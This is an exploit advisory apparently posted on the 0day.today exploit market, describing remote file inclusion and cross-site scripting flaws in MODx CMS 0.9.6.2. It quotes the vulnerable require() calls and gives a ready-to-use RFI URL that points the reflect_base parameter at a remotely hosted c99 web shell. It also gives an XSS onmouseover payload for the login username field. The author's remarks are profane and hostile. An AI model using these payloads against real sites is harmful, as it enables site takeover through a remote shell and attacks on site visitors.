[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MODx CMS <= 0.9.6.2 (RFI/XSS) Multiple Remote Vulnerabilities

Author
RoMaNcYxHaCkEr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4236
Category
web applications
Date add
23-11-2008
Platform
unsorted
=============================================================
MODx CMS <= 0.9.6.2 (RFI/XSS) Multiple Remote Vulnerabilities
=============================================================


########################################################################
#
#                               ::  The Codes Like A Game Anyone Can Play With It,s ::
#
# Title: MODx CMS  <= 0.9.6.2  Multiple Remote Vulne ( RFI + XSS)
#
# Vendor: http://modxcms.com/assets/snippets/filedownload/download.php?path=YnVpbGRz&fileName=modx-0.9.6.2.tar.gz&utm_source=0961p2&utm_medium=web&utm_campaign=download
#
# Discover by : RoMaNcYxHaCkEr (Br0k3n H34rT)
#
# Impact: High
#
########################################################################

####################
- Vulne  [RFI] In File snippet.reflect.php In Path assets/snippets/reflect/:
####################


require($reflect_base."configs/default.config.php");

require($reflect_base."default.templates.php");


####################
- Exploit  [RFI]:
####################

http://WwW.Sec-Code.CoM/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.shellbox.com.ar/%5Bc%5D/c99.txt?


####################
- Exploit  [XSS] In File index.php In Main Path:
####################

http://WwW.Sec-Code.CoM/modx-0.9.6.2/index.php?id=1

By POST Method Posted That,s In username Box (Variable)

"+onmouseover=alert(400942638703)+

####################
- Solution:
####################

Declear & Filter All This Fucking Functions

####################
- GreTzZ :
####################

No oN3 D3s3rved Just Fuck The Lamers , Kidz Or Snitch ( I Hate Him , And Do You ...!!! )

####################



#  0day.today [2024-12-25]  #